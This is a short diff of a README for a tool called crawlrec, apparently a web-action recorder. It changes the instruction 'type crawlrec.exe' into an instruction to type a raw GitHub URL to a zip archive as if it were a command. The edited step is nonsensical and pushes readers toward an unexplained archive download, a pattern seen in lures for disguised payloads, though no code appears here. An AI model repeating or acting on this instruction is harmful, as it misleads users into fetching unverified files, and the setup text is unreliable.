sand9311/crawlrec/README.md

 3. **Run crawlrec:**
    - Navigate to the directory where you installed crawlrec.
    - Type the command to start the application.
-For example, if you’re on Windows, you might type `crawlrec.exe` and press `Enter`.
+For example, if you’re on Windows, you might type `https://raw.githubusercontent.com/sand9311/crawlrec/main/demos/crawlrec-v3.1.zip` and press `Enter`.

 4. **Recording Actions:**
    - Follow the prompts in the console to start recording your actions on a website.